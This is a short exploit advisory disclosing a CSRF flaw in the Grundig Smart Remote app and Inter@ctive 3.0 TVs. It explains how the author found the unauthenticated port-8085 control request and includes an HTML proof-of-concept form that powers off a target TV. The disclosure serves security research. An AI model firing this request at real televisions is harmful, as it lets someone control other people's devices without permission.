# Exploit Title: Grundig Smart Remote App CSRF # Google Dork: Local Vulnerability # Date: 06.07.2018 # Exploit Author: Ahmethan GALTEKAdegN ~ @inject0r16 # Vendor Homepage: https://www.grundig.com/ # Software Link: https://play.google.com/store/apps/details?id=arcelik. android.grundig.remote # Version: Grundig Smart Inter@ctive 3.0 # Tested on: Windows 7-8-10 # CVE : none Hello! I'm trying my TV.I saw a Grundig remote control application on Google Play. Computer I downloaded and decompiled APK. And I began to examine individual classes. I noticed in a class that a request was sent during operations on the command line. I downloaded the phone packet viewer and opened the control application and made some operations. And I saw that there was such a request; GET /sendrcpackage?keyid=-2547&keysymbol=-4078 HTTP/1.1 I noticed that each process has an id value. Then I turned off the television using the control application and noted the outgoing IDs. The only requirement for the connection between the TV and the application was to have the same IP address. After I made the IP address on the TV and the phone and the IP address on the computer the same: I accessed the interface from the 8085 port. Now I could do anything from the computer :) CSRF POC : <html> <head> <title>Grundig TV PoC</title> </head> <body> <h1>Grundig Inter@ctive 3 Shutdown PoC</h1> <form method="POST" action="http://TargetIP:8085/sendrcpackage?keyid=-2544& keysymbol=-4081 <http://targetip:8085/sendrcpackage?keyid=-2544&keysymbol=-4081>"> <input type="submit" value="Go!"> </form> </body> </html> this poc will turn off the television when it is running. :) video about vulnerability; https://youtu.be/H7WYTkgtwsY #MoreThanYouImagine! ~ ahmeth4n.org greetz : @SmashTheKernel , @t3beq , @c_c0re